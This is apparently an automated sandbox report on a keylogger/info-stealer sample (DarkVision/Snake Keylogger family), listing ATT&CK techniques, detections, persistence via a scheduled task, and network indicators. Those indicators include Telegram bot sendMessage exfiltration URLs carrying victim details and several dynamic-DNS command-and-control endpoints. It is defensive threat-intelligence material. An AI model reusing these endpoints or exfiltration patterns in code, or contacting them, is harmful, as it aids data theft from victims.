Source: Yara match	File source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ti5nuRV7y4.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DarkVision
Ti5nuRV7y4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\aoTiGLRa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\aoTiGLRa.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DarkVision

Source	Detection	Scanner	Label	Link
http://kashmirestore.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
kashmirestore.com	119.18.54.39	true	true	unknown
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.228	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003509000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enH	aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003504000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/H	aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.228$	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.000000000325B000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
http://kashmirestore.com	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003545000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003373000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003390000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003400000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehH	aoTiGLRa.exe, 00000011.00000002.1374494417.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ti5nuRV7y4.exe, 00000000.00000002.1309507329.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20a	Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003231000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003390000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
119.18.54.39	kashmirestore.com	India	394695	PUBLIC-DOMAIN-REGISTRYUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569417
Start date and time:	2024-12-05 18:50:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ti5nuRV7y4.exe renamed because original name is a hash value
Original Sample Name:	228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 277 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Ti5nuRV7y4.exe

Simulations

Behavior and APIs

Time	Type	Description
12:51:02	API Interceptor	8249482x Sleep call for process: Ti5nuRV7y4.exe modified
12:51:08	API Interceptor	32x Sleep call for process: powershell.exe modified
12:51:10	API Interceptor	5705669x Sleep call for process: aoTiGLRa.exe modified
18:51:10	Task Scheduler	Run new task: aoTiGLRa path: C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	H61PaEPFJC.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Teklif Talebi #U0130hale No_14991_PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	K1_Chit_Form.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Teklif Talebi- #U0130hale 14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	2xVbI4Oc7A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	DX7V71Ro7b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	H61PaEPFJC.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	2xVbI4Oc7A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
api.telegram.org	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2xVbI4Oc7A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DX7V71Ro7b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
kashmirestore.com	xz8lxAetNu.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	0kqoTVd5tK.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
checkip.dyndns.com	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	H61PaEPFJC.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	2xVbI4Oc7A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2xVbI4Oc7A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DX7V71Ro7b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	tegga.hta	Get hash	malicious	Xmrig	Browse	172.67.206.14
	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	SADP.zip	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://www.nomadaproducciones.com/hz	Get hash	malicious	Unknown	Browse	172.67.143.34
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PHuHRcCpaJ.exe	Get hash	malicious	LummaC	Browse	172.67.160.80
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
UTMEMUS	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	H61PaEPFJC.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Teklif Talebi #U0130hale No_14991_PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	x86.elf	Get hash	malicious	Mirai	Browse	132.225.27.197
PUBLIC-DOMAIN-REGISTRYUS	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	PO82200487.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	ORDER#023_2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	QFEWElNtpn.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	SoA_14000048_002.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Quote 000002320.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	new booking 9086432659087.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.251.80.30
